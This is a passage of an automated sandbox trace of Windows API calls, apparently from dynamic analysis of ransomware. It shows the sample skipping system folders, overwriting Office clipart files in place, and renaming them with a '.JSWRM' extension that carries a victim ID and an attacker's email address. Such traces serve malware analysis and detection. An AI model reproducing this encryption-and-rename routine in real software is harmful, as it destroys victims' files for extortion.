hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0086.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0086.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0086.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0086.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0172193.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0172193.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0086.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0086.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0086.029] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeac9c22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0174315.WMF", cAlternateFileName="")) returned 1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2=".") returned 1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="..") returned 1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="...") returned 1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="windows") returned -1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="recovery") returned -1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="perflogs") returned -1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="documents and settings") returned 1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="system volume information") returned -1 [0086.029] lstrcmpiW (lpString1="J0174315.WMF", lpString2="msocache") returned -1 [0086.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0086.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174315.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174315.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0174315.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0086.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0086.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174315.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174315.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0174315.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0086.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0086.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.030] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5864) returned 1 [0086.030] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16e0) returned 0x205850 [0086.030] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16e0, lpOverlapped=0x0) returned 1 [0086.033] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.033] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16e0, lpOverlapped=0x0) returned 1 [0086.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.033] CloseHandle (hObject=0x314) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0086.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0086.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0086.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0086.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0086.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0086.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0086.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0086.033] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174315.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174315.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0086.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0086.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0086.034] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2608, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0174635.WMF", cAlternateFileName="")) returned 1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2=".") returned 1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="..") returned 1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="...") returned 1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="windows") returned -1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="recovery") returned -1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="perflogs") returned -1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="documents and settings") returned 1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="system volume information") returned -1 [0086.034] lstrcmpiW (lpString1="J0174635.WMF", lpString2="msocache") returned -1 [0086.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0086.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174635.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174635.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0174635.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0086.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0086.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174635.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174635.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0174635.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0086.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0086.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.035] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9736) returned 1 [0086.036] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2600) returned 0x24d210 [0086.036] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2600, lpOverlapped=0x0) returned 1 [0086.039] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.039] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2600, lpOverlapped=0x0) returned 1 [0086.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.039] CloseHandle (hObject=0x314) returned 1 [0086.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0086.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0086.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0086.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0086.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0086.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0086.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.039] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174635.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174635.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0086.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0086.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.040] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0174639.WMF", cAlternateFileName="")) returned 1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2=".") returned 1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="..") returned 1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="...") returned 1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="windows") returned -1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="recovery") returned -1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="perflogs") returned -1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="documents and settings") returned 1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="system volume information") returned -1 [0086.040] lstrcmpiW (lpString1="J0174639.WMF", lpString2="msocache") returned -1 [0086.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0086.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174639.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174639.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0174639.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0086.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0086.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174639.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0174639.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0174639.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0086.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0086.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0086.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0086.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.041] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5100) returned 1 [0086.041] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13e0) returned 0x205850 [0086.041] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x13e0, lpOverlapped=0x0) returned 1 [0086.043] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.043] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x13e0, lpOverlapped=0x0) returned 1 [0086.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.043] CloseHandle (hObject=0x314) returned 1 [0086.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0086.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0086.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0086.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0086.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0086.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.044] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0174639.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0174639.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0086.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0086.044] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6196, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0174952.JPG", cAlternateFileName="")) returned 1 [0086.044] lstrcmpiW (lpString1="J0174952.JPG", lpString2=".") returned 1 [0086.044] lstrcmpiW (lpString1="J0174952.JPG", lpString2="..") returned 1 [0086.044] lstrcmpiW (lpString1="J0174952.JPG", lpString2="...") returned 1 [0086.044] lstrcmpiW (lpString1="J0174952.JPG", lpString2="windows") returned -1 [0086.045] lstrcmpiW (lpString1="J0174952.JPG", lpString2="recovery") returned -1 [0086.045] 